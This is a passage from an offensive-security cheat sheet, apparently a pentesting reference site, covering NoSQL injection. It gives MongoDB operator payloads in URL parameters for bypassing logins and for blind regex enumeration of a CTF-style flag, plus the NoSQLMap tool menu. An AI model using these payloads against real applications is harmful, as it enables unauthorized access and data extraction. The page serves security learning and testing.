Navigation :
Open Source Intelligence (OSINT)
Web Pentest
-
Resources Discovery
-
Applicative Scans
-
Content Management Systems (CMS)
-
Injections
--
Server Side Injections
--- SQL Injections
--- NoSQL Injections
--- LDAP Injections
--- XPath Injections
--- Server Side Request Forgery (SSRF)
--- OS Command Injections
--- SSTI
--
Client Side Injections
-- Headers Injections
-
File & File Inclusions
-
PHP Vulnerabilities
-
Tools
- Attacking APIs
- CVE & Vulns exploits
- Bug Bounty Tips
- MISC
Network
Shells methods
Windows Systems
Linux Systems
Other Systems
Passcracking Hash & Files
Phishing, RedTeam and SE
Wireless
Cryptography
Pwn
Defensive, Monitoring, CTI...
External Resources
NoSQL Injections
NoSQLMap
https://github.com/codingo/NoSQLMap
1-Set options ( do this first)
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
x-Exit
Basic Authentication
index.php?login[ $regex ]= a.*& pass[ $ne ]= lol
index.php?login[ $gt ]= admin& login[ $lt ]= test& pass[ $ne ]= 1
# Basic NoSQL Injection
http://url?login[ $nin ][]= admin& login[ $nin ][]= test& pass[ $ne ]= toto
Blind NoSQL Injection
# Get size
index.php ?chall_name= nosqlblind& flag[ $regex ]= .1
# Enumeration
index.php ?chall_name= nosqlblind& flag[ $regex ]= 3a.20